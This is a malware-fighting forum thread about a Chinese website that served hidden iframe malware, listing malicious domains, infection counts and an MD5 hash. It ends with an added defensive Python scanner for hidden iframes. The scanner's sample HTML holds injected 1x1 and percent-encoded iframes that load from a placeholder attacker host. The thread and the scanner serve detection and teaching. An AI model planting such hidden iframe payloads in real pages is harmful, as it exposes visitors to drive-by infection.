Dangerous Chinese site with iFrame malware...

Hi malware fighters,

See unmasked pirates report for 021webcomcn
Of the 217 pages we tested on the site, 2 pages resulted in malicious software being downloaded and installed without user consent. The last time suspicious content was found on this site was on 2010-07-04.

Malicious software includes 1116 exploits, 1101 scripting exploits, 5 trojans. Successful infection resulted in an average of 6 new processes on the target machine.

Malicious software is hosted on 11 domains, including dwefsd.com/, 92mimi4.cn/, wdf345.3322.org/.

This site was hosted on 1 network including AS4812 (CT).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, 021web.com.cn appeared to function as an intermediary for the infection of 246 site(s) including vannghevietnam.vn/, dongnai.gov.vn/, 1081.com.vn/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 185 domains, including vannghevietnam.vn/, dongnai.gov.vn/, vietbalo.vn/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Infection details:

MD5: 873fab89c387bd0d2225a5689f152e81
Infection Type: IFRAME
Description: A malicious IFRAME can source in content from web pages that attempt to fingerprint and exploit a browser vulnerability or client/OS vulnerability to cause a drive-by-download. Such IFRAMEs are typically invisible to users.
Code Length: 75 bytes
Code Sample:
Top-level URL

God bless you polonus. 8)

Do you not think it would be a good idea to keep such posts in a single topic, making it easier to reference/find?
A bit like the Updates, Interesting software, Security, etc. etc.

It is a good idea, but I think if they don't get stacked a small number will attach and see it, so it is nicer now.

Hi Superhacker,

We could also discuss the “%3C%69%66%” type of malware-code, you see where your two scripts are coming in handy now, my friend: WordPress software malcode: http://wordpress.org/support/topic/327326
http://cpansearch.perl.org/src/WORRALL/Net-Analysis-0.41/t/t1_google.hex
http://www.prevx.com/blog/132/Compromised-FTP-details-being-exploited-by-in-the-wild-malware.html

There are so many in-routes to an interesting malcode discussion, and we the posters do have to find the various patterns at once to do a “quick and dirty” for the victims, for instance this script (with some 1,560 Google results), described here:
http://wam.dasient.com/wam/infection_library/e59265d71b18d86665437ab32d20436a/postfolkovs

polonus
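As an added defender-side example (not code from the original thread, nor from the scripts or tools polonus mentions): a small Python scanner that flags the two injection patterns described above, invisible iframes (1x1, zero-size or CSS-hidden) and iframes that only appear after undoing percent-encoding of the "%3C%69%66..." kind. The sample page and its attacker-placeholder.invalid domain are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample page (not from the original post): one legitimate iframe,
# one injected 1x1 hidden iframe, and one iframe hidden inside a percent-encoded
# document.write(unescape(...)) payload of the "%3C%69%66..." kind.
SAMPLE_HTML = """
<html><body>
<iframe src="https://video.example.org/embed/123" width="640" height="360"></iframe>
<iframe src="http://attacker-placeholder.invalid/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape("%3C%69%66%72%61%6D%65%20src%3D%22http%3A%2F%2Fattacker-placeholder.invalid%2Fx.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"))</script>
</body></html>
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"([a-z-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))", re.IGNORECASE)


def _attrs(raw):
    """Parse the attribute string of one tag into a lowercase-keyed dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}


def _tiny(value):
    """True for width/height values of 0 or 1 (with or without 'px')."""
    digits = re.sub(r"[^0-9]", "", value or "")
    return digits != "" and int(digits) <= 1


def find_hidden_iframes(html):
    """Return a list of {src, reasons} for every suspicious iframe in html."""
    findings = []
    # Pass 1: the page as served. Pass 2: the page with percent-encoding undone,
    # which surfaces iframes that are only assembled by unescape()/document.write().
    for decoded, text in ((False, html), (True, unquote(html))):
        for m in IFRAME_RE.finditer(text):
            reasons = []
            if decoded:
                if m.group(0) in html:
                    continue  # already examined in pass 1
                reasons.append("percent-encoded")
            a = _attrs(m.group(1))
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("1x1-or-zero-size")
            style = a.get("style", "").replace(" ", "").lower()
            if "display:none" in style or "visibility:hidden" in style:
                reasons.append("css-hidden")
            if reasons:
                findings.append({"src": a.get("src", ""), "reasons": reasons})
    return findings
```

The legitimate 640x360 embed is not reported; the 1x1 hidden frame and the percent-encoded zero-size frame both are, each with the reasons that triggered it.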